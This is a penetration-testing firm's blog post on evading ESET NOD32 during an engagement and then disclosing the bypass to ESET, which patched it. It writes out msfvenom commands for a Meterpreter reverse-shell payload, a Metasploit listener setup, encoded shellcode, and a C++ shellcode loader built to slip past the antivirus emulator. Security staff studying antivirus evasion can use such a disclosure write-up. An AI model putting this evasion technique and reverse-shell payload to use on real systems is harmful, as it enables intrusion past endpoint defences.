How We Bypassed NOD32 and Hacked a Paranoid Customer

During penetration testing for a big customer, we hacked a number of Microsoft Windows servers. At one point, part of our attack was thwarted by ESET’s NOD32 system. However, we were able to alter our attack to evade NOD32‘s radar, and in this post, we share the story of how we did it.

Brief Overview

One of the tools we use for penetration testing is Metasploit, combined with Meterpreter as a payload. It was precisely this payload that we wanted to use during penetration testing with this customer. However, the customer’s antivirus system, NOD32, stood in the way of this process. Such systems are not a deterrent to the motivated and adroit hacker – quite the opposite. We were able to devise a way to obfuscate Meterpreter such that NOD32 could not detect it.

The following section is a bit technical, but it’s certainly not rocket science.

First, we generated a binary. LHOST is the IP address of our Kali Linux system with a waiting listener.

# msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -f exe >meterpreter.exe

After generating meterpreter.exe, we got set up on the console and proceeded as follows (once again, LHOST is the address of the Kali Linux system):

# msfconsole<br /># msf &gt; use exploit/multi/handler<br />msf exploit(handler) &gt; set payload windows/meterpreter/reverse_tcp<br />payload =&gt; windows/meterpreter/reverse_tcp<br />msf exploit(handler) &gt; set LHOST<br />msf exploit(handler) &gt; set LPORT 4444<br />msf exploit(handler) &gt; run<br />[*] Started reverse handler on<br />[*] Starting the payload handler...

We copied the generated meterpreter.exe over to the customer system and started it up. In msfconsole on Kali Linux we saw the connection complete:

[*] Sending stage (770048 bytes) to<br />[*] Meterpreter session 1 opened ( -&gt; at 2014-10-22 19:03:43 -0500

Files Transmitted

First, we started up meterpreter.exe on the host. Once the connection completed, the metsrv.x86.dll library was sent over from a folder on the customer’s system.


We modified this DLL prior to sending it. On the host, it was not saved as a file; rather, meterpreter loaded it directly into memory. From the standpoint of bypassing NOD32, this bit didn’t really matter.

Preventing Detection


Customizing this file was surprisingly simple. Since it’s open source, getting the source code online is trivial:

We opened the project in Visual Studio and ran a debug build (msbuild.exe or xbuild on Linux might have also worked). The file was created in the folder meterpreter\output\x86\Debug\.

Once the original file was overwritten, NOD32 stopped detecting it.


NOD32 immediately caught the generated meterpreter.exe. We achieved concealment of the code on two levels.

First, we generated some encoded Meterpreter shellcode that we could embed into the C++ source. The selection of encoder and other parameters went via trial and error:

```msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -e x86/shikata_ga_nai -b ‘\x00’ -i 3 -f c >mp.txt

<p>mp.txt then contained the following (for example):</p>

unsigned char code[] =

<p>When we inserted the generated shellcode into the C++ code that launched it, NOD32 still detected it. We needed to pull off one more trick, and our resulting code used to launch the shellcode turned out like this:</p>

unsigned char shellcode[] = “\xbb\x2e\x27\x94\x3b\xdb\xde\xd9\x74\x24\xf4\x5f\x31\xc9\xb1” int APIENTRY tWinMain(_In HINSTANCE hInstance, In_opt HINSTANCE hPrevInstance, In LPTSTR lpCmdLine, In int nCmdShow) { int nArgs; const LPWSTR * argv; argv = CommandLineToArgvW(GetCommandLine(), &nArgs); if (nArgs > 0) { TCHAR buffer[MAX_PATH] = { 0 }; const TCHAR * fileName; if (GetModuleFileName(NULL, buffer, sizeof(buffer))) { fileName = PathFindFileName(buffer); (PathFindExtension(fileName)) = 0; if (wcsstr(argv[0], fileName) > 0) { int(func)() = (int(*)())&shellcode; while (true) { func(); } } } } } ```

The code that runs before launching the shellcode itself might be blocked by the antivirus’s emulator. This is true in the case of NOD32. The principle is described, for example, here:

NOD32, however, had trouble emulating the reading of the command line, so emulation of the shellcode didn’t actually happen. Ultimately, it was still necessary to use an encoder to ensure that the shellcode wasn’t detected via simple pattern matching.

Informing ESET, and The Fix

We contacted ESET with this information. The ensuing conversation with the company was a pleasant one. They were happy with our professionalism and fixed the bug the very next day. We made an agreement with them as to how we would publicize the method we used to identify this vulnerability in the NOD system. We would like to extend our thanks to ESET for an excellent collaboration.

As part of responsible disclosure, when ethical hackers and security researchers stumble upon a vulnerability in a program or a system they will inform the creator(s), describe the problem and propose solutions (in contrast to unethical hackers abusing or selling the vulnerability information). Software developers’ and system operators’ reactions vary: it is not uncommon to encounter responses ranging from incomprehension to hostility. We have had such experiences in the past and have described them on our blog. Other companies welcome researchers, and even go as far as to set up “bug bounty” programs under which they can earn rewards for discovering vulnerabilities. How any given disclosure goes is often a shot in the dark, and how the report is received depends on both the company's stance and on the personality of the particular staff member.

Summing Up

We were quite pleased with this experience. Bypassing a high-quality antivirus system such as NOD was an interesting challenge, and of course we were glad to succeed. The quick, friendly and businesslike discussion with the folks from ESET was also pleasing. We extend our thanks to Peter Košinár and Peter Kováč, as well as to Daniel Kapča, who figured out the bypass itself.

Let’s make the world a more secure place together! :)

About the author

Citadelo is a firm of ethical hackers on your side. We think like hackers, but we don't abuse it. On the contrary, our main goal is to reveal vulnerabilities without causing damage. We have been conducting simulated attacks for our clients since 2006
Show more from author

Related blogs

How to order a pen test

Blog | | Martin Hanic
Although people working in the IT security industry may consider this question to be as trivial as "How to order a phone charger", for many, writing a purchase order for a penetration test can be like designing a nuclear power plant.

Unofficial Patch Tuesday – MSMQ Privilege Escalation Vulnerability Hotfix

Blog | | Citadelo
This security patch resolves a public vulnerability in the Windows Message Queuing Service (MSMQ) discovered by KoreLogic

We found vulnerability of CMS Made Simple

Blog | | Citadelo
CMS Made Simple is a free, open source CMS to provide developers, programmers and site owners a web-based development and administration area. In 2010 it won the Packt Publishing annual award for open source content management.

ExtendedMacro – BurpSuite plugin

Blog | | Citadelo
BurpSuite Proxy is one of the most used HTTP proxy application for web penetration testers. This tool is one of the best in its category, but sometimes we encounter a situation requiring additional functionality which is not provided by Burp itself.